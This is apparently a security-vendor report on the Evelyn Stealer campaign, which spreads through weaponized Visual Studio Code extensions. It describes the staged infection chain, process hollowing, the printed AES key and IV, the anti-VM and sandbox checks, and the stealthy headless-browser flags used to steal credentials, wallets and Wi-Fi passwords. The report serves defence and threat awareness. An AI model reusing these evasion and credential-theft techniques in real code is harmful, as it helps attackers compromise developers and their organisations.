From Extension to Infection - An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers

Analysis of the Evelyn Stealer campaign targeting software developers shows that threat actors are weaponizing the Visual Studio Code (VSC) extension ecosystem to deploy a multistage, information-stealing malware. The malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data. Compromised developer environments can also be abused as access points into broader organizational systems. This activity affects organizations with software development teams that rely on VSC and third-party extensions as well as those with access to production systems, cloud resources, or digital assets. On December 8, 2025, Koi.ai published their findings about a campaign specifically targeting software developers through weaponized Visual Studio Code extensions. Evelyn implements multiple anti-analysis techniques to evade detection in research and sandbox environments. It collects system information and harvests browser credentials through DLL injection as well as files and information such as clipboard and Wi-Fi credentials. It can also capture screenshots and steal cryptocurrency wallets. The malware communicates with its command-and-control (C&C) server over FTP.

Upon successfully installing the malicious VSC extension, the downloader pretends to be a legitimate Lightshot DLL component, which is then executed by the genuine Lightshot.exe. Upon loading, the DLL immediately executes its payload. It then launches a hidden PowerShell command to download and execute a second-stage payload and store it in the Local Temp directory as “runtime.exe”. The second-stage payload of this malware campaign is a process hollowing injector, designed to decrypt and inject a third-stage payload into the legitimate Windows process, “grpconv.exe”. The malware uses AES-256-CBC encryption to decrypt the final payload, which is a copy of Evelyn Stealer. The malware uses the following AES Key and IV to decrypt the embedded payload: AES Key (32 bytes): 2e649f6145f55988b920ff5a445e63aae29c80495b830e0d8bb4b3fff4b1f6f4 - IV (16 bytes): 5c507b22e9814428c5f2b1ef213c5c4a.

Upon execution of Evelyn Stealer, the malware employs multiple layers of evasion techniques specifically designed to thwart security researchers, automated analysis systems, and sandbox environments. The malware implements different virtual machine detection methods, debugger detection, and specialized checks for analysis environments like Remote Desktop Protocol (RDP) sessions and Hyper-V. The following are the list of anti-VM and anti-sandbox techniques used by the malware: GPU analysis: Detects VMware, VirtualBox, Hyper-V, Parallels, QEMU, VirtIO, and basic display adapters; Hostname analysis: Checks the computer name for VM indicators; Disk size analysis: Flags systems with less than 60 GB of disk space, such as VMs; Process analysis: Scans for VM-related processes (e.g., vmtoolsd.exe, vboxservice.exe); Registry analysis: Checks hardware registry keys for VM identifiers, a relatively sophisticated evasion technique to avoid analysis environments. Once the malware acquires abe_decrypt.dll, it targets browsers by implementing a process creation and DLL injection technique specifically designed to compromise browser security mechanisms. It bypasses many standard protection mechanisms, including sandboxing, extension-based security tools, and user interface (UI) protections. The malware constructs an extensive command line with more than 15 browser flags, specifically designed to minimize detection and forensic traces: “–headless=new”, “–disable-gpu”, “–no-sandbox”, “–disable-extensions”, “–disable-logging”, “–silent-launch”, “–no-first-run”, “–disable-popup-blocking”, “–window-position=-10000,-10000”, “–window-size=1,1”. Additionally, the malware captures desktop screenshots and collects various information from the infected machine, including the following: System information such as username, computer name, OS version, installed software, running processes, sensitive files, VPN configuration, and more; Cryptocurrency wallets; Clipboard data; Wi-Fi passwords.

The Evelyn Stealer campaign reflects the operationalization of attacks against developer communities, which are seen as high-value targets given their important role in the software development ecosystem. By embedding itself in VSC extensions and staging its execution through loaders and process hollowing, the campaign treats the developer environment itself as the delivery mechanism. Reinforcing its attack chain with advanced capabilities such as AES-256-CBC encryption, multilayered anti-analysis techniques, and an apparently disciplined operational security, the campaign underscores a level of maturity designed to evade detection while exploiting the implicit trust developers place in their tools. As developers increasingly become prime targets due to their privileged access and cryptocurrency holdings, organizations must implement comprehensive security measures including extension vetting, behavioral monitoring, and zero-trust architectures specifically designed for development workflows.

To read the complete article see: Trend Micro Research.